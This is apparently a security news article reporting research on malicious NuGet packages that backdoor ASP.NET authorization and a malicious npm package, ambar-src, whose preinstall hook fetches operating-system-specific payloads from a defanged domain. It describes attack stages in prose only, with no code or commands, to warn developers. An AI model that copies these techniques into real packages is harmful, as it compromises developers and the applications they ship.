The digital landscape is under constant threat, and the software supply chain has emerged as a prime target for sophisticated cyberattacks. Recent revelations by cybersecurity researchers underscore this vulnerability, detailing two distinct but equally alarming campaigns involving malicious NuGet and npm packages designed to compromise developer environments and, ultimately, the applications they build.
ASP.NET Developers Targeted by Malicious NuGet Packages
A cunning campaign, unearthed by Socket, has exposed four malicious NuGet packages engineered to infiltrate ASP.NET web application development. These packages were not merely designed to steal data; they aimed to establish persistent backdoors, granting attackers long-term access to victim applications.
The Modus Operandi: Data Theft and Backdoors
The quartet of rogue packages – NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ – were published to the NuGet repository between August 12 and 21, 2024, by a user identified as “hamzazaheer.” Despite being swiftly removed following responsible disclosure, they had already amassed over 4,500 downloads, indicating a significant potential for compromise.
According to Socket’s analysis, the attack unfolds in stages:
- NCryptYo: The Initial Dropper
Masquerading as the legitimate ‘NCrypto’ package,NCryptYoacts as a first-stage dropper. Upon execution, it establishes a local proxy onlocalhost:7152, dynamically relaying traffic to an attacker-controlled command-and-control (C2) server. Security researcher Kush Pandya elaborated, “NCryptYo is a stage-1 execution-on-load dropper… its static constructor installs JIT compiler hooks that decrypt embedded payloads and deploy a stage-2 binary – a localhost proxy on port 7152.” - DOMOAuth2_ and IRAOAuth2.0: Identity Theft and Authorization Manipulation
Once the proxy is active, these packages spring into action, exfiltrating critical ASP.NET Identity data – including user accounts, role assignments, and permission mappings – through the local proxy to the external C2 infrastructure. The C2 server then responds with manipulated authorization rules, allowing the threat actor to create persistent backdoors by granting themselves administrative roles, altering access controls, or disabling crucial security checks.
- SimpleWriter_: Unconditional File Operations
This package, deceptively presented as a PDF conversion utility, provides unconditional file writing and hidden process execution capabilities, allowing the attacker to drop and run arbitrary binaries on the compromised system.
Crucially, the campaign’s objective, as explained by Pandya, is not to directly compromise the developer’s machine but to “compromise the applications they build.” By manipulating the authorization layer during development, attackers gain a foothold in deployed production applications, allowing them to continuously exfiltrate data and maintain admin-level access.
npm’s Ambar-src: A Multi-Platform Malware Dropper
Adding to the growing list of software supply chain threats, Tenable recently detailed a malicious npm package named ambar-src. This package, uploaded on February 13, 2026, garnered over 50,000 downloads before its removal from the JavaScript registry, showcasing the broad reach of such attacks.
Operating System-Specific Payloads
Ambar-src leverages npm’s preinstall script hook to execute malicious code within its index.js during installation. The malware then fetches different payloads from the domain x-ya[.]ru, adapting its attack based on the victim’s operating system:
- Windows: Downloads and executes
msinit.exe, which contains encrypted shellcode decoded and loaded into memory. - Linux: Fetches and executes a bash script, which in turn retrieves an ELF binary functioning as an SSH-based reverse shell client.
- macOS: Deploys a script utilizing
osascriptto run JavaScript, dropping Apfell – a JavaScript for Automation (JXA) agent from the Mythic C2 framework. Apfell is capable of extensive reconnaissance, screenshot capture, data theft from Google Chrome, and even system password harvesting via fake prompts.
The attackers behind ambar-src
employ multiple evasion techniques and exfiltrate collected data to a Yandex Cloud domain. This choice of infrastructure aims to blend with legitimate traffic, exploiting the trust often afforded to widely used cloud services within corporate networks.
Ambar-src is considered a more advanced iteration of eslint-verify-plugin, another malicious npm package previously identified by JFrog for deploying Mythic agents.
The Pervasive Threat to Software Development
These incidents serve as a stark reminder of the escalating risks within the software supply chain. Developers and organizations must remain vigilant, scrutinizing third-party dependencies and implementing robust security practices to mitigate the threat of malicious packages. The compromise of development tools and libraries can have cascading effects, impacting countless production systems and sensitive data.
For more details, visit our website.
Source: Link
Leave a comment